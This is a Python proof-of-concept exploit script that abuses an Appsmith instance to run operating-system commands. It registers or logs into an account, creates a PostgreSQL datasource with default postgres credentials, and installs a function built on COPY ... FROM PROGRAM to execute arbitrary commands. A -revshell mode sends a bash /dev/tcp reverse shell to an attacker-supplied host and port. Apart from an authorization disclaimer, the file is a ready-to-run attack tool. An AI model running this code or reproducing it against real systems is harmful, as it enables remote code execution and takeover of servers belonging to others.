#!/usr/bin/env python3
"""Proof-of-concept: run an OS command through an Appsmith PostgreSQL datasource.

The script authenticates against an Appsmith instance (registering the
account first if login fails), creates a PostgreSQL datasource that points at
``localhost:5432`` with the ``postgres``/``postgres`` credentials, and then
creates and executes two query actions: one that installs a helper function
built on ``COPY ... FROM PROGRAM`` and one that calls it with the requested
command.

Only run this against systems you own or are explicitly authorized to test.
"""
import json
import random
import re
import string
import sys
from urllib.parse import urlencode, urljoin

import requests
import urllib3

# Certificate verification is turned off on the session in main(); silence
# the warnings urllib3 would otherwise print for every request.
urllib3.disable_warnings()

# SQL executed once per run: a scratch table plus a function that runs `cmd`
# via COPY ... FROM PROGRAM and returns the captured output line by line.
SQL_SETUP = """
CREATE TABLE IF NOT EXISTS cmd_output (line text);
CREATE OR REPLACE FUNCTION exec_cmd(cmd text) RETURNS TABLE(line text) AS $$
BEGIN
  TRUNCATE TABLE cmd_output;
  EXECUTE format('COPY cmd_output FROM PROGRAM %L', cmd);
  RETURN QUERY SELECT t.line FROM cmd_output t;
END;
$$ LANGUAGE plpgsql;
"""

USAGE = (
    f"{sys.argv[0]} <base_url> <email> <password> [cmd]"
    " | -revshell <lhost> <lport>"
)


def rand(n=8):
    """Return a random string of *n* lowercase letters and digits."""
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=n))


def die(msg, resp=None):
    """Print *msg* (and a summary of *resp*, if given) and exit with status 1."""
    print("ERROR:", msg)
    if resp is not None:
        print(resp.status_code, resp.text[:300])
    sys.exit(1)


def json_ct(r):
    """Return True when response *r* declares an ``application/json`` body."""
    return r.headers.get("content-type", "").startswith("application/json")


def first_id(xs):
    """Return the ``id`` of the first item in *xs*, or None when *xs* is empty."""
    return xs[0]["id"] if xs else None


def fetch_csrf(sess, base):
    """Try several strategies to obtain a CSRF token.

    Order: JSON token endpoints, then the signup page's hidden ``_csrf``
    field or ``<meta>`` tag, and finally the ``XSRF-TOKEN`` cookie.
    Returns the token string, or None if nothing was found.
    """
    for p in ("/csrf", "/api/v1/users/csrfToken", "/api/v1/csrf"):
        r = sess.get(urljoin(base, p), headers={"Accept": "application/json"})
        if r.ok and json_ct(r) and "token" in r.text:
            return r.json().get("token")

    r = sess.get(urljoin(base, "/user/signup"))
    m = (
        re.search(r'name="_csrf"\s+value="([^"]+)"', r.text)
        or re.search(r'<meta[^>]+name="_csrf"[^>]+content="([^"]+)"', r.text)
    )
    if m:
        return m.group(1)

    # Last resort: issue a request so the server has a chance to set the
    # cookie, then read it from the session's cookie jar.
    sess.get(urljoin(base, "/api/v1/users/me"),
             headers={"X-Requested-With": "XMLHttpRequest"})
    return sess.cookies.get("XSRF-TOKEN")


def try_login(sess, base, email, pw):
    """Log in with *email*/*pw*; return True if ``/users/me`` reports that email."""
    print(f"[+] trying login for {email}")
    sess.post(
        urljoin(base, "/api/v1/login"),
        data=urlencode({"username": email, "password": pw}),
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        allow_redirects=False,
    )
    # The login response itself is not inspected; success is confirmed by
    # checking which user the session now belongs to.
    r = sess.get(urljoin(base, "/api/v1/users/me"))
    if r.ok and json_ct(r) and (r.json().get("data") or {}).get("email") == email:
        print("[+] login succeeded")
        return True
    print("[-] login failed")
    return False


def try_signup(sess, base, email, pw):
    """Register *email*/*pw*; return True on a 200, 201 or 302 response."""
    print(f"[+] attempting signup with {email}")
    data = {"email": email, "password": pw}
    csrf = fetch_csrf(sess, base)
    if csrf:
        data["_csrf"] = csrf
    r = sess.post(
        urljoin(base, "/api/v1/users"),
        data=data,
        headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Origin": base,
            "Referer": urljoin(base, "/user/signup"),
        },
        allow_redirects=False,
    )
    if r.status_code in (200, 201, 302):
        print("[+] registration succeeded")
        return True
    print("[-] registration failed")
    return False


def get_workspace(sess, base):
    """Return the id of the first workspace visible to the session.

    Tries the workspace listing endpoints first, then the workspace lists
    embedded in ``/users/me``. Exits through :func:`die` when none is found.
    """
    for p in ("/api/v1/workspaces/home", "/api/v1/workspaces"):
        r = sess.get(urljoin(base, p))
        if r.ok and json_ct(r) and r.json().get("data"):
            return r.json()["data"][0]["id"]

    r = sess.get(urljoin(base, "/api/v1/users/me"))
    if r.ok and json_ct(r):
        j = r.json().get("data") or {}
        for key in ("workspaces", "workspaceDTOs"):
            if j.get(key):
                return j[key][0]["id"]
    die("no workspace found – open the UI once to finish onboarding")


def pick_environment(sess, base, ws):
    """Return an environment id for workspace *ws*, or "" on legacy servers."""
    # modern servers
    r = sess.get(urljoin(base, f"/api/v1/environments/workspaces/{ws}"))
    if r.ok and json_ct(r) and r.json().get("data"):
        return r.json()["data"][0]["id"]

    # try to create one (mid-2023 builds)
    r = sess.post(urljoin(base, "/api/v1/environments"),
                  json={"name": "PROD", "workspaceId": ws})
    if r.ok and json_ct(r) and r.json().get("data"):
        return r.json()["data"]["id"]

    # Older servers do not use environmentId
    print("[*] legacy server – operating without environmentId")
    return ""


def create_app(sess, base, ws, name):
    """Create application *name* in workspace *ws*; return its first page id."""
    # Some versions take workspaceId as a query parameter; otherwise fall
    # back to submitting it in the JSON body.
    r = sess.post(urljoin(base, f"/api/v1/applications?workspaceId={ws}"),
                  json={"name": name})
    if r.status_code == 201:
        return first_id(r.json()["data"]["pages"])

    r = sess.post(urljoin(base, "/api/v1/applications"),
                  json={"name": name, "workspaceId": ws})
    if r.status_code == 201:
        return first_id(r.json()["data"]["pages"])
    die("app create failed", r)


def create_action(sess, base, page_id, plugin_id, ds_id, name, body):
    """Create a query action running *body* on datasource *ds_id*; return its id."""
    payload = {"pluginSpecifiedTemplates": [{"value": True}], "body": body}
    r = sess.post(urljoin(base, "/api/v1/actions"), json={
        "name": name,
        "pageId": page_id,
        "pluginId": plugin_id,
        "datasource": {"id": ds_id},
        "actionConfiguration": payload,
    })
    if r.status_code != 201:
        die(f"create {name} failed", r)
    return r.json()["data"]["id"]


def exec_action(sess, base, aid, env, tolerant=False):
    """Execute action *aid* and return the ``data`` object of the response.

    *env* is sent as the ``environmentId`` header when non-empty. With
    ``tolerant=True`` HTTP errors and unsuccessful executions are ignored
    instead of terminating the script.
    """
    dto = {
        "actionId": aid,
        "viewMode": False,
        "paramProperties": {},
        "analyticsProperties": {"isUserInitiated": True},
    }
    # The endpoint is called with a multipart body carrying the DTO as a
    # JSON part.
    files = {"executeActionDTO": (None, json.dumps(dto), "application/json")}
    hdrs = dict(sess.headers)
    if env:
        hdrs["environmentId"] = env
    r = sess.post(urljoin(base, "/api/v1/actions/execute"),
                  headers=hdrs, files=files)
    if not r.ok and not tolerant:
        die(f"execute {aid} failed", r)
    data = (r.json().get("data") or {}) if json_ct(r) else {}
    if not tolerant and not data.get("isExecutionSuccess", False):
        die(f"action {aid} not successful", r)
    return data


def _find_postgres_plugin(sess, base):
    """Return the id of the first plugin whose name starts with "postgres"."""
    for p in ("/api/v1/plugins", "/api/v1/plugins/default/icons"):
        r = sess.get(urljoin(base, p))
        if not (r.ok and json_ct(r)):
            continue
        for pl in r.json().get("data") or []:
            if pl.get("name", "").lower().startswith("postgres"):
                return pl["id"]
    return None


def main(argv=None):
    """Parse the command line and run the full request sequence."""
    argv = sys.argv if argv is None else argv
    if len(argv) < 4:
        die(USAGE)

    # Only the URL is normalised; credentials must be passed through
    # untouched.
    base = argv[1].rstrip("/")
    email, pw = argv[2], argv[3]

    if len(argv) >= 5 and argv[4] == "-revshell":
        if len(argv) != 7:
            die(USAGE)
        cmd = f"bash -c 'bash -i >& /dev/tcp/{argv[5]}/{argv[6]} 0>&1'"
        revshell = True
    else:
        cmd = argv[4] if len(argv) >= 5 else "id"
        revshell = False
    print("command:", cmd)

    sess = requests.Session()
    sess.verify = False
    sess.headers["X-Requested-By"] = "Appsmith"

    # Log in; if that fails, register the account and log in again.
    if not (try_login(sess, base, email, pw)
            or (try_signup(sess, base, email, pw)
                and try_login(sess, base, email, pw))):
        die("authentication failed")

    ws = get_workspace(sess, base)
    print("workspace_id:", ws)
    env = pick_environment(sess, base, ws)
    print("environment_id:", env or "")

    pg = _find_postgres_plugin(sess, base)
    if not pg:
        die("postgres plugin not found")
    print("postgres_plugin_id:", pg)

    # Reuse the first existing application's page, or create a fresh app.
    apps = sess.get(urljoin(base, "/api/v1/applications")).json().get("data") or []
    page_id = (first_id(apps[0]["pages"]) if apps
               else create_app(sess, base, ws, f"auto_{rand()}"))
    print("page_id:", page_id)

    # Datasource storage is keyed by environment id; the workspace id is
    # used as the key when the server has no environments.
    env_key = env or ws
    conf = {
        "authentication": {"databaseName": "postgres",
                           "username": "postgres",
                           "password": "postgres"},
        "endpoints": [{"host": "localhost", "port": "5432"}],
        "connection": {"mode": "READ_WRITE", "ssl": {"authType": "DEFAULT"}},
    }
    ds_body = {
        "name": f"pg_{rand()}",
        "pluginId": pg,
        "workspaceId": ws,
        "datasourceStorages": {
            env_key: {"isConfigured": True, "datasourceConfiguration": conf},
        },
    }
    res = sess.post(urljoin(base, "/api/v1/datasources"), json=ds_body)
    if res.status_code != 201:
        die("datasource create", res)
    ds_id = res.json()["data"]["id"]
    print("datasource_id:", ds_id)

    # test DB connectivity. skip if legacy
    if env:
        j = sess.post(urljoin(base, "/api/v1/datasources/test"), json={
            "datasourceId": ds_id,
            "environmentId": env,
            "datasourceConfiguration": conf,
            "pluginId": pg,
            "workspaceId": ws,
        }).json().get("data") or {}
        if not (j.get("valid") or j.get("success")):
            die("datasource test failed")
        print("postgres reachable")
    else:
        print("postgres test skipped (legacy)")

    setup_id = create_action(sess, base, page_id, pg, ds_id,
                             "setup_cmd_objects", SQL_SETUP)
    # Double single quotes so the command is a valid SQL string literal.
    # Done outside the f-string: backslashes inside a replacement field are
    # a syntax error before Python 3.12.
    quoted_cmd = cmd.replace("'", "''")
    run_sql = f"SELECT * FROM exec_cmd('{quoted_cmd}');"
    run_id = create_action(sess, base, page_id, pg, ds_id,
                           "run_command", run_sql)

    exec_action(sess, base, setup_id, env)
    print("setup executed")

    if revshell:
        # Run tolerantly: failures of this request are ignored rather than
        # treated as fatal.
        exec_action(sess, base, run_id, env, tolerant=True)
        print("attempted to execute reverse shell")
    else:
        out = exec_action(sess, base, run_id, env)
        rows = out.get("body", [])
        if isinstance(rows, list) and all(isinstance(x, dict) for x in rows):
            for i, row in enumerate(rows, 1):
                print(f"{i:03}: {row.get('line')}")
        else:
            print(json.dumps(rows, indent=2))


if __name__ == "__main__":
    main()